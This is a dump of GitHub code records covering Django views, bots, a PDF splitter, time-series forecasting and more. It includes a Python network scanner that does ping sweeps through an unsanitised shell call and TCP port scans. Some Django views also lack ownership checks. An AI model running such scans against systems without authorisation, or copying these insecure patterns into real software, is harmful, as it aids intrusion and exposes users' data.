=LabirintoManual(27,17)\r\n#mat.manual()\r\n\r\n#print(\"X: {} - Y: {}\".format(mat.po))\r\n#lab = interface(mat)\r\n#lab.to_execute_Automatico()","repo_name":"DanielCardozoSantos/Labirinto","sub_path":"labirinto-main/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"18004043416","text":"from django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\nfrom rest_framework import status\nfrom django.contrib.auth.models import User\n\n\nfrom . import models, serializers\n\n\n@csrf_exempt\n@api_view([\"GET\"])\n@permission_classes((AllowAny,))\ndef get_lots(request, username):\n \"\"\"Get all lots belonging to a user\"\"\"\n author_object = User.objects.get(username=username)\n author_id = author_object.id\n lots = models.Lot.objects.all().filter(author_id=author_id)\n serializer = serializers.LotSerializer(lots, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\n@csrf_exempt\n@api_view([\"GET\"])\n@permission_classes((AllowAny,))\ndef get_lot(request, id):\n \"\"\"Get specific lot belonging to a user, given lot ID\"\"\"\n lot = models.Lot.objects.get(id=id)\n if lot:\n serializer = serializers.LotSerializer(lot)\n return Response(serializer.data, status=status.HTTP_200_OK)\n else:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view([\"PATCH\"])\n@permission_classes((IsAuthenticated,))\ndef update_lot(request, id):\n \"\"\"Updates lot, given lot ID\"\"\"\n lot = models.Lot.objects.get(id=id)\n serializer = serializers.LotSerializer(lot, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view([\"DELETE\"])\n@permission_classes((IsAuthenticated,))\ndef delete_lot(request, id):\n \"\"\"Deletes lot, given lot ID\"\"\"\n lot = models.Lot.objects.get(id=id)\n if lot:\n lot.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n else:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view([\"POST\"])\n@permission_classes((IsAuthenticated,))\ndef new_lot(request):\n \"\"\"Creates new lot\"\"\"\n user = request.user\n data = request.data\n data['author_id'] = user.id\n serializer = serializers.LotSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n\n","repo_name":"t0ri/builds-api","sub_path":"builds/lots/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"12144456688","text":"\"\"\"Информация о функционале бота.\"\"\"\nfrom configs import log_configured\nfrom telegram import Update\nfrom telegram.ext import ContextTypes\n\nlogger = log_configured.getLogger(__name__)\n\n\nasync def help_command(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n \"\"\"Логика команды /help.\"\"\"\n if update.effective_chat is not None:\n message: str = (\n 'Бот предназначен для отображения курса рубля по отношению к следующим валютам:\\n'\n '1. Доллар США (USD)\\n'\n '2. Евро (EUR)\\n'\n '3. Китайский юань (CNY)\\n'\n '4. Белорусский рубль (BYN)\\n'\n 'На выбранные валюты можно подписаться (в том числе не на все)'\n )\n\n await context.bot.send_message(\n chat_id=update.effective_chat.id,\n text=message,\n )\n else:\n logger.warning('Не получен ID чата при запросе /help.')\n","repo_name":"McElast/ru_crs_bot","sub_path":"bot_commands/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"10467803900","text":"from rest_framework import serializers\n\nfrom users.models import User\n\n\nclass UserSerializer(serializers.ModelSerializer):\n payments = serializers.SerializerMethodField()\n\n class Meta:\n model = User\n fields = ('id', 'first_name', 'last_name', 'email', 'phone', 'city', 'payments', 'is_active')\n ref_name = 'UserSerializer'\n\n def get_payments(self, instance):\n return instance.payment_set.all().select_related('course', 'lesson').values(\n 'date_payment',\n 'amount',\n 'payment_method',\n 'course__title',\n 'lesson__title'\n )\n\n\nclass UserSerializerForPayment(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ('id', 'first_name', 'email', 'phone', 'city')\n ref_name = 'UserSerializerForPayment'\n\n\nclass UserUpdateSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ('first_name', 'last_name', 'phone', 'city', 'avatar',)\n ref_name = 'UserUpdateSerializer'\n","repo_name":"DmitriiParfenov/lms_system_project","sub_path":"users/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7042659091","text":"class Solution:\n def isEscapePossible(self, blocked, source, target):\n blocked = set(map(tuple, blocked))\n\n def dfs(x, y, target, seen):\n if not (0 <= x < 10**6 and 0 <= y < 10**6) or (x, y) in blocked or (x, y) in seen: return False\n \n seen.add((x, y))\n if len(seen) > 20000 or [x, y] == target: return True\n return dfs(x + 1, y, target, seen) or \\\n dfs(x - 1, y, target, seen) or \\\n dfs(x, y + 1, target, seen) or \\\n dfs(x, y - 1, target, seen)\n \n return dfs(source[0], source[1], target, set()) and dfs(target[0], target[1], source, set())\n ","repo_name":"hwennnn/leetcode-solutions","sub_path":"problems/escape_a_large_maze/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"91"}
+{"seq_id":"25383463846","text":"import os\npath = '/home/yaobo/background/'\n\n\n# 重命名\nfilename_list = os.listdir(path)\na = 0\nj = 1\nfor i in filename_list:\n used_name = path + filename_list[a]\n new_name = path + \"yao_e12_\"+str(j)+'.jpg'\n os.rename(used_name, new_name)\n print(\"文件%s成功命名,新的文件名为%s\" % (used_name, new_name))\n a += 1\n j += 1\n","repo_name":"yaoyaobo/ImageProcessing","sub_path":"图片重命名.py","file_name":"图片重命名.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"24225983745","text":"from PyPDF2 import PdfFileWriter, PdfFileReader\nimport PyPDF2\nimport sys\nimport copy\n\ndef printProgress (iteration, total, prefix = '', suffix = '', decimals = 1, barLength = 50):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n barLength - Optional : character length of bar (Int)\n \"\"\"\n formatStr = \"{0:.\" + str(decimals) + \"f}\"\n percent = formatStr.format(100 * (iteration / float(total)))\n filledLength = int(round(barLength * iteration / float(total)))\n bar = '💃' * filledLength + '-' * (barLength - filledLength)\n sys.stdout.write('\\r%s |%s| %s%s %s' % (prefix, bar, percent, '%', suffix)),\n if iteration == total:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\noutput = PdfFileWriter()\ninputFile = \"input.pdf\"\nif len(sys.argv) > 1:\n\tinputFile = sys.argv[1]\n\n\ninput_pdf = PdfFileReader(open(inputFile, \"rb\"))\nskip_pages = [0];\ninput_length = input_pdf.getNumPages()\nprint(\"file \" + inputFile + \" is read successfully with \" + str(input_length) + \" pages\")\n\nfor i in range(input_length):\n\tif i in skip_pages:\n\t\toutput.addPage(input_pdf.getPage(i))\n\telse:\n\t\t# page_left = PyPDF2.pdf.PageObject.createBlankPage()\n\t\t# page_right = PyPDF2.pdf.PageObject.createBlankPage()\n\t\t# page_left.mergePage(input_pdf.getPage(i))\n\t\t# page_right.mergePage(input_pdf.getPage(i))\n\t\tpage_left = input_pdf.getPage(i)\n\t\tpage_right = copy.copy(page_left)\n\t\t\n\t\tpage_right.mediaBox.upperRight = (\n\t\t\tpage_right.mediaBox.getUpperRight_x()/2,\n\t\t\tpage_right.mediaBox.getUpperRight_y()\n\t\t)\n\t\tpage_left.mediaBox.upperLeft = (\n\t\t\tpage_left.mediaBox.getUpperRight_x()/2,\n\t\t\tpage_left.mediaBox.getUpperRight_y()\n\t\t)\n\t\toutput.addPage(page_left)\n\t\toutput.addPage(page_right)\n\tprintProgress(i, input_length)\noutputFile = \"output.pdf\"\nprint(\"finished successfully! writing file\")\nif len(sys.argv) > 2:\n\toutputFile = sys.argv[2]\noutput.write(open(outputFile, \"wb\"))\nprint(\"file written successfully\")\n\n","repo_name":"romaad/pdf-manipulator","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"635141042","text":"import os\r\nimport json\r\nimport argparse\r\nimport requests\r\nimport socket\r\n\"\"\" ввод аргументов\"\"\"\r\n# Пример команды запуска под windows:py scanner_for_win.py -i 77.222.40.29 -n 3 scan\r\nparser = argparse.ArgumentParser(description='Network scanner')\r\nparser.add_argument('task', choices=['scan', 'sendhttp'], default='scan', help='Network scan or send HTTP request')\r\nparser.add_argument(\r\n '-i', # краткая форма аргумента\r\n '--ip', # полное имя аргумента\r\n type=str,\r\n default='192.168.2.1', # значение по умолчанию, если не передан аргумент\r\n help='IP address'\r\n )\r\nparser.add_argument('-n', '--num_of_hosts', type=int, help='кол-во хостов')\r\nparser.add_argument('-t', '--target', type=str, help='Выбрать домен.Target')\r\nparser.add_argument('-m', '--method', choices=['GET', 'POST'], type=str, help='Method (GET|POST)')\r\nparser.add_argument('-hd', '--headers', type=str, help='Headers (name1:value1 name2:value2 ...)')\r\nargs = parser.parse_args()\r\n# Для тестирования без ввода аргументов\r\n# task = 'scan'\r\n# ip = '77.222.40.29'\r\n# num_of_hosts = 3\r\n\"\"\" функция сканер ip \"\"\"\r\ndef do_ping_sweep(ip, num_of_host):\r\n ip_parts = ip.split('.')\r\n network_ip = ip_parts[0] + '.' + ip_parts[1] + '.' + ip_parts[2] + '.'\r\n scanned_ip = network_ip + str(int(ip_parts[3]) + num_of_host)\r\n response = os.popen(f'ping -n 1 {scanned_ip}')\r\n #response = os.popen(f'ping -n -c 1 {scanned_ip}') # Под линукс\r\n res = response.readlines()\r\n if \"TTL\" in res[2]:\r\n ip_ok.append(scanned_ip)\r\n #print(f\"[#] Result of scanning: {scanned_ip} [#]\\n{res[2]}\", end='\\n')\" # Под Линукс\r\n print(f\"[#] Result of scanning: {scanned_ip} [#]\\n{res[2].encode('cp1251').decode('cp866')}\", end='\\n') #Под Windows\r\n\r\n\"\"\" функция запроса к домену\"\"\"\r\ndef sent_http_request(target, method, headers=None, payload=None):\r\n headers_dict = dict()\r\n if headers:\r\n for header in headers:\r\n header_name = header.split(\":\")[0]\r\n header_value = header.split(\":\")[1:]\r\n headers_dict[header_name] = \":\".join(header_value)\r\n\r\n if method == \"GET\":\r\n response = requests.get(target, headers=headers_dict)\r\n elif method == \"POST\":\r\n response = requests.post(target, headers=headers_dict, data=payload)\r\n print(\r\n f\"[#] Response status code: {response.status_code}\\n\"\r\n f\"[#] Response headers: {json.dumps(dict(response.headers), indent=4, sort_keys=True)}\\n\"\r\n f\"[#] Response content:\\n {response.text}\"\r\n )\r\n\r\n\"\"\"Сканер портов\"\"\"\r\ndef port_scanner(host, port):\r\n try:\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.connect((host, port))\r\n return True\r\n except:\r\n return False\r\n\r\n\"\"\"выбор режима работ сканера \"\"\"\r\nip_ok = []\r\npayload = \"\"\r\nif args.task == 'scan':\r\n for host_num in range(args.num_of_hosts):\r\n do_ping_sweep(args.ip, host_num)\r\nelse:args.task == 'sendhttp'\r\n# target = str(input(\"Выбрать домен.Target:\"))\r\n# method = str(input(\"Method (GET|POST):\"))\r\n# headers = list(input(\"Headers (name1:value1 name2:value2 ...)\").split())\r\nheaders = args.headers\r\npayload = \"\"\r\n#if args.method == \"POST\":\r\n #payload = str(input(\"Payload:\"))\r\nsent_http_request(args.target, args.method, headers, payload)\r\n#elif sent_http_request(args.target, args.method, args.headers):\r\n\r\nprint(\"Список ответивших хостов:\\n\", ip_ok) # Список ответивших ip\r\n\r\n\"\"\" выбор портов и хостов для сканирования\"\"\"\r\nif 
input(\"Просканировать порты обнаруженных хостов - \"\"1\"\". Ввести новый хост вручную -\"\"2\"\" : \") == \"1\":\r\n host = ip_ok\r\nelse:\r\n host = input(\"Enter the host to be scanned: \").split()\r\n ip_ok = host\r\nport_start = int(input(\"Enter start of the port range: \"))\r\nport_end = int(input(\"Enter end of the port range: \"))\r\nopen_ports = []\r\nfor host in ip_ok:\r\n print(host)\r\n for port in range(port_start, port_end+1):\r\n if port_scanner(host, port):\r\n open_ports.append(port)\r\n if open_ports:\r\n print(\"Open ports:\", open_ports)\r\n open_ports = []\r\n else:\r\n print(\"No open ports found.\")\r\n\r\n","repo_name":"mspb1/mspb","sub_path":"scanner_for_win.py","file_name":"scanner_for_win.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"4884504539","text":"\"\"\"Parsing Log Files\"\"\"\nimport re\nimport collections\n\nFILE_NAME = 'access_log.log'\n\n\ndef find_most_requests(data):\n \"\"\"\n Returns list of 10 clients of this server requesting the largest\n number of pages\n :param data:\n :return: list\n \"\"\"\n reg = r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}'\n list_ip = re.findall(reg, data)\n counter_ip = collections.Counter(list_ip)\n return counter_ip.most_common(10)\n\n\ndef find_popular_platforms(data):\n \"\"\"\n Returns 5 most popular platforms (OS) for launching web browsers\n :param data:\n :return: list\n \"\"\"\n reg = r'((Linux|Windows|Macintosh|Unix|iPhone OS).*?)(?=\\))'\n list_group = re.findall(reg, data)\n list_os = [item[0] for item in list_group]\n counter_ip = collections.Counter(list_os)\n return counter_ip.most_common(5)\n\n\ndef main():\n \"\"\"\n Opens logfile, runs and print find_most_requests() and\n find_popular_platforms()\n :return:\n\n \"\"\"\n try:\n with open(FILE_NAME, 'r') as f:\n data = f.read()\n print(find_most_requests(data))\n print(find_popular_platforms(data))\n except FileNotFoundError:\n print(\"No such file or directory:\", FILE_NAME)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Mari1234Med/FunctionalPractice","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"30727108577","text":"N = int(input()) # 테스트 케이스 갯수\nfor i in range(N):\n words = input() # 단어 입력\n check_word = \"\" # 뒤집을 단어\n for j in range(len(words)-1, -1, -1): #단어 뒤집어서 만들어주기\n check_word += words[j]\n if words == check_word: # 같으면 1반환\n print(f\"#{i+1} 1\")\n else: # 다르면 0반환\n print(f\"#{i+1} 0\")","repo_name":"DHKim95/TIL","sub_path":"Algorithm Study/SWEA/D2/SWEA_1989.py","file_name":"SWEA_1989.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"2789241854","text":"# Import necessary libraries\nimport numpy as np\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\nimport datetime as dt\n\nfrom flask import Flask, jsonify\n\n# Create engine\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n# Create base\nBase = automap_base()\n\n# Connect base to engine\nBase.prepare(engine, reflect=True)\n\n# Create connection to measurement class\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n# Create required routes\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef welcome():\n return (\n f\"Welcome to the Climate App API! \"\n f\"Available Routes: \"\n f\"/api/v1.0/precipitation \"\n f\"/api/v1.0/stations \"\n f\"/api/v1.0/tobs \"\n f\"/api/v1.0/START_DATE \"\n f\"Please type your start date in YYYY-MM-DD format to retrieve min, avg and max of observed temperatures. \"\n f\"/api/v1.0/START_DATE/END_DATE \"\n f\"Please type your start date and end date in YYYY-MM-DD/YYYY-MM-DD format to retrieve min, avg and max of observed temperatures.\"\n )\n\n\n@app.route(\"/api/v1.0/precipitation\")\ndef prcp():\n #Create Session\n session = Session(engine)\n\n # Query results\n \n most_active_station = session.query(Station.station, Station.name, func.count(Measurement.tobs)).\\\n filter(Measurement.station == Station.station).\\\n group_by(Station.station).\\\n order_by(func.count(Measurement.tobs).desc()).first()[0]\n\n results = session.query(Measurement.date, Measurement.prcp).filter(Measurement.station == most_active_station).all()\n\n session.close()\n\n date_prcp = []\n\n for date, prcp in results:\n prcp_dict = {}\n prcp_dict['Date'] = date\n prcp_dict['Precipitation'] = prcp\n date_prcp.append(prcp_dict)\n\n return jsonify(date_prcp)\n\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n #Create Session\n session = Session(engine)\n\n # Query results\n \n results = session.query(Station.station).all()\n\n session.close()\n\n all_stations = list(np.ravel(results))\n\n return jsonify(all_stations)\n\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n #Create Session\n session = Session(engine)\n\n # Query results\n \n most_active_station = session.query(Station.station, Station.name, func.count(Measurement.tobs)).\\\n filter(Measurement.station == Station.station).\\\n group_by(Station.station).\\\n order_by(func.count(Measurement.tobs).desc()).first()[0]\n\n results = session.query(Measurement.date, Measurement.tobs).\\\n filter(Measurement.station == most_active_station).all()\n\n session.close()\n\n tobs_list = []\n\n for date, tobs in results:\n tobs_dict = {}\n tobs_dict['Temperature Observation (F)'] = tobs\n tobs_list.append(tobs_dict)\n\n return jsonify(tobs_list)\n\n\n@app.route(\"/api/v1.0/\")\ndef start_date(start):\n #Create Session\n session = Session(engine)\n\n # Query results\n\n dates = session.query(Measurement.date).all()\n\n dates = list(np.ravel(dates))\n \n if start in dates:\n calc_start = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).all()\n\n session.close()\n \n\n result = list(np.ravel(calc_start))\n\n result_dict = {'Min Temperature (F)': result[0], 'Avg Temperature (F)': result[1], 'Max Temperature (F)': result[2]}\n\n return jsonify(result_dict)\n else:\n return (f'Oops, we have encountered a problem! '\n f'Possible Results: '\n f'1. 
The date you search for is not within the data set. '\n f'2. You have not typed the date in the required format. '\n f'Note: Required Date Format is YYYY-MM-DD'\n )\n\n\n@app.route(\"/api/v1.0//\")\ndef start_end_date(start, end):\n #Create Session\n session = Session(engine)\n\n # Query results\n\n dates = session.query(Measurement.date).all()\n\n dates = list(np.ravel(dates))\n \n if start in dates:\n if end in dates:\n\n calc_start = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).filter(Measurement.date <= end).all()\n\n session.close()\n \n result = list(np.ravel(calc_start))\n\n result_dict = {'Min Temperature (F)': result[0], 'Avg Temperature (F)': result[1], 'Max Temperature (F)': result[2]}\n\n return jsonify(result_dict)\n else:\n return (f'Oops, we have encountered a problem! '\n f'Possible Results: '\n f'1. The end date you search for is not within the data set. '\n f'2. You have not typed the end date in the required format. '\n f'Note: Required Date Format is YYYY-MM-DD'\n )\n\n return (f'Oops, we have encountered a problem! '\n f'Possible Results: '\n f'1. The start date you search for is not within the data set. '\n f'2. You have not typed the start date in the required format. '\n f'Note: Required Date Format is YYYY-MM-DD'\n )\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"alexturkmen/Climate-Analysis-Using-SQLAlchemy","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
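The angle-bracket converters in the two routes above are load-bearing: Flask only passes `start`/`end` into the view when the rule declares them, otherwise calling the view raises TypeError. A minimal standalone sketch:

from flask import Flask

demo = Flask(__name__)

@demo.route("/api/v1.0/<start>")           # <start> is captured from the URL path...
def start_only(start):
    return f"start={start}"

@demo.route("/api/v1.0/<start>/<end>")     # ...and handed to the view as keyword arguments
def start_and_end(start, end):
    return f"start={start}, end={end}"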
+{"seq_id":"29611745647","text":"from scipy.stats import skew, kurtosis, shapiro\nimport seaborn as sns\n\nimport statsmodels\nimport statsmodels.api as sm\nfrom statsmodels.tsa.stattools import coint, adfuller\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, mean_absolute_percentage_error\n\nfrom statsmodels.tsa.arima_model import ARIMA\nfrom statsmodels.tsa.statespace.sarimax import SARIMAX, SARIMAXResults\n\nfrom pmdarima import auto_arima\nfrom statsmodels.tsa.seasonal import seasonal_decompose\n\nimport matplotlib.dates as mdates\nimport scipy.stats\nimport pylab\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler, MinMaxScaler\n\nimport pandas as pd\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport math\nimport sys\nimport warnings\nimport pickle\n\nclass arimaModel:\n def __init__(self, datapath, category_name):\n warnings.filterwarnings(\"always\", category=UserWarning, module='arimaModel')\n # This will be used to search for the reading files in the directory.\n self.datapath = datapath\n folderName = \"Model_incercam9_\" + category_name\n self.folderPath = self.create(folderName)\n self.modelName = \"arima_\"+category_name+'.pkl'\n self.df = pd.read_csv(datapath)\n \n self.df['time'] = pd.to_datetime(self.df['time'])\n self.df = self.df.sort_values('time')\n self.df = self.df.set_index('time')\n \n def create(self, dirName):\n if not os.path.exists('../' + dirName):\n os.mkdir('../' + dirName)\n print(\"Directory \" , dirName , \" Created \")\n else: \n print(\"Directory \" , dirName , \" already exists\")\n \n return os.path.abspath('../' + dirName)\n\n # Data is standardized in order to allow application of models that are sensitive to scale, like neural networks or svm.\n # Remember that distribution shape is maintained, it only changes first and second momentum (mean and standard deviation)\n def normalize(self, df):\n ss_1 = StandardScaler()\n df_2 = pd.DataFrame(ss_1.fit_transform(df), index = df.index, columns = df.columns)\n return(df_2,ss_1)\n \n def norm_tra(self, df_1, ss_x):\n df_2 = pd.DataFrame(ss_x.transform(df_1), index = df_1.index, columns = df_1.columns)\n return(df_2)\n\n def split_data(self, s_df):\n\n df_train = s_df[s_df.index < \"2018-04-01\"]\n df_test = s_df[s_df.index >= \"2018-04-01\"]\n \n return df_train, df_test\n\n\n def fit_ARIMA(self, x_train, y_train):\n exogenous_features = set(x_train.columns.values) - set(['movave_3', 'movstd_3', 'movave_7', 'movstd_7', 'movave_30', 'movstd_30', 'q10', 'q50', 'q90'])\n exogenous_features = list(exogenous_features)\n print(\"exogenous features: \", exogenous_features)\n\n #model = auto_arima(y_train.avg, exogenous=x_train[exogenous_features], trace=True, error_action=\"ignore\",\n #suppress_warnings=True, seasonal = True, m=48, start_p = 0, max_p = 2, max_q = 5, maxiter = 15, max_P=2, max_Q = 2, d = 0, D = 1)\n #model = ARIMA(endog = y_train.avg, exog = exogenous_features, order =[1,0,3], seasonal_order = [0,1,0,48])\n model= SARIMAX(y_train.avg,\n freq = '30T',\n exog=x_train[exogenous_features],\n order=(0,0,0),\n seasonal_order = (1,1,1,48),\n enforce_invertibility=False, enforce_stationarity=False, simple_differencing = False)\n fit = model.fit(maxiter=50)\n return fit #model\n\n \n def predict(self, model, x_test, y_test, ss):\n exogenous_features = set(x_test.columns.values) - set(['movave_3', 'movstd_3', 'movave_7', 'movstd_7', 'movave_30', 'movstd_30', 'q10', 'q50', 'q90'])\n exogenous_features = 
list(exogenous_features)\n #forecast, confint = model.predict(len(x_test), exogenous = x_test[exogenous_features], return_conf_int = True)\n #new_model = model.append(endog = y_test.avg, exog = x_test[exogenous_features], refit = False)\n fcast = model.get_forecast(steps = len(x_test), index = y_test.index, freq = '30T', exog = x_test[exogenous_features])\n #fc, se, conf = model.forecast(len(x_test), exog = x_test[exogenous_features], alpha=0.05) # 95% conf\n #res = pd.DataFrame(index = x_test.index)\n #res['Forecast_ARIMAX'] = forecast\n #res['forecast_normal'] = res['Forecast_ARIMAX'] #ss.inverse_transform(res['Forecast_ARIMAX'].values.reshape(-1, 1))\n #fc_series = pd.Series(fc, index=y_test.index)\n #lower_series = pd.Series(conf[:, 0], index=y_test.index)\n #upper_series = pd.Series(conf[:, 1], index=y_test.index)\n #cf= pd.DataFrame(confint, index = res.index)\n\n return fcast #res, cf\n\n def residual_analysis(self, df_valid):\n residuals=df_valid.avg-df_valid.forecast_normal\n\n self.dicky_fuller_test(residuals, 0.05)\n\n residuals.plot()\n plt.savefig(self.folderPath + '/residual_analysis.pdf')\n plt.close()\n plt.cla()\n plt.clf()\n \n def print_corr(self, s_df, col='avg'):\n correlations = s_df.corr(method='pearson')\n print(correlations[col].sort_values(ascending=False).to_string())\n\n def evaluation(self, df_valid, model):\n RMSE = 0\n MAE = 0\n MAPE = 0\n days = 0\n for i in range(48, len(df_valid), 48):\n RMSE_d = np.sqrt(mean_squared_error(df_valid.iloc[(i-48):i].avg, df_valid.iloc[(i-48):i].forecast_normal))\n MAE_d = mean_absolute_error(df_valid.iloc[(i-48):i].avg, df_valid.iloc[(i-48):i].forecast_normal)\n MAPE_d = mean_absolute_percentage_error(df_valid.iloc[(i-48):i].avg, df_valid.iloc[(i-48):i].forecast_normal)\n if(i==48):\n print(\"RMSE for 01-04-2018:\", RMSE_d)\n print(\"\\nMAE for 01-04-2018:\", MAE_d)\n print(\"\\nMAPE for 01-04-2018:\", MAPE_d)\n RMSE = RMSE + RMSE_d\n MAE = MAE + MAE_d\n MAPE = MAPE + MAPE_d\n days = days + 1\n \n print(\"RMSE for 30-06-2018:\", RMSE_d)\n print(\"\\nMAE for 30-06-2018:\", MAE_d)\n print(\"\\nMAPE for 30-06-2018:\", MAPE_d)\n print(\"RMSE of Auto ARIMAX:\", RMSE/days)\n print(\"\\nMAE of Auto ARIMAX:\", MAE/days)\n print(\"\\nMAPE of Auto ARIMAX:\", MAPE/days)\n\n\n model.plot_diagnostics(figsize=(15, 12))\n plt.savefig(self.folderPath + '/diagnostics.pdf')\n plt.close()\n plt.cla()\n plt.clf()\n\n self.print_corr(df_valid, 'forecast_normal')\n #correlations = df_valid.corr(method='pearson')\n #print(correlations['Forecast_ARIMAX'].sort_values(ascending=False).to_string())\n \n def dicky_fuller_test(self, x, cutoff = 0.05):\n result = adfuller(x)\n print('ADF Statistic: %f' % result[0])\n print('p-value: %f' % result[1])\n print('Critical Values:')\n for key, value in result[4].items():\n print('\\t%s: %.3f' % (key, value))\n if result[1]>cutoff:\n print(\"Fail to reject the null hypothesis (H0), the data is non-stationary\")\n else:\n print(\"Reject the null hypothesis (H0), the data is stationary.\")\n \n def main(self):\n df_train, df_test = self.split_data(self.df)\n x_train = df_train.drop(columns = ['avg'])\n y_train = df_train['avg'].to_frame()\n y_train_norm, ss = self.normalize(y_train)\n \n x_test = df_test.drop(columns = ['avg'])\n y_test = df_test['avg'].to_frame()\n y_test_norm = self.norm_tra(y_test, ss)\n \n model = self.fit_ARIMA(x_train, y_train)\n results = self.predict(model, x_test, y_test, ss)\n #result['avg'] = y_test.avg\n print(self.modelName + \": \")\n print(model.summary())\n \n #cf_integral = 
pd.DataFrame(ss.inverse_transform(cf), index = cf.index, columns = cf.columns)\n #print('conf int: ', cf)\n #print('normal conf int', cf_integral)\n print(type(results))\n print('results: \\n', results)\n\n cf = results.conf_int()\n \n #plt.figure(figsize=(12,5), dpi=100)\n #plt.plot(y_train.avg, label='training')\n #plt.plot(y_test.avg, label='actual')\n #plt.plot(results, label='forecast')\n #plt.fill_between(lcf.index, lcf, ucf, \n # color='k', alpha=.15)\n #plt.title('Forecast vs Actuals')\n #plt.legend(loc='upper left', fontsize=8)\n\n #results.index = df_test.index.copy()\n #results.set_index('time', inplace = True)\n\n fig, ax = plt.subplots(1, 1, figsize=(15, 5))\n ax.plot(y_test.avg)\n ax.plot(results.predicted_mean)\n #ax.fill_between(y_test_norm.index,\n # cf[0],\n # cf[1],color='grey',alpha=.3)\n ax.fill_between(results.predicted_mean.index, cf.iloc[:,0], cf.iloc[:,1], color='grey', alpha=0.3);\n plt.savefig(self.folderPath + '/resultsPlot_w_ConfInt.pdf')\n plt.close()\n plt.cla()\n plt.clf()\n \n '''\n fig3, ax3 = plt.subplots(1, 1, figsize=(15, 5))\n ax3.plot(y_test.avg)\n ax3.plot(results.forecast_normal)\n ax3.fill_between(y_test.index,\n cf_integral[0],\n cf_integral[1],color='grey',alpha=.3)\n plt.savefig(self.folderPath + '/resultsPlot_wConfInt_normal.pdf')\n plt.close()\n plt.cla()\n plt.clf()\n '''\n \n \n fig2, ax2 = plt.subplots(1, 1, figsize=(15, 5))\n ax2.plot(y_test.avg)\n ax2.plot(results.predicted_mean)\n plt.savefig(self.folderPath + '/resultsPlot_normal.pdf')\n plt.close()\n plt.cla()\n plt.clf()\n \n #results_test = pd.concat([df_test, results], axis=1)]\n df_test['forecast_normal'] = results.predicted_mean\n\n self.residual_analysis(df_test)\n self.evaluation(df_test, model)\n \n model.save(self.folderPath +'/'+ self.modelName)\n #with open(self.folderPath +'/'+ self.modelName, 'wb') as pkl:\n # pickle.dump(model, pkl)\n \n \n \n\n","repo_name":"alexchelba/Electricity-Analysis","sub_path":"ARIMA/modelHelper.py","file_name":"modelHelper.py","file_ext":"py","file_size_in_byte":10230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
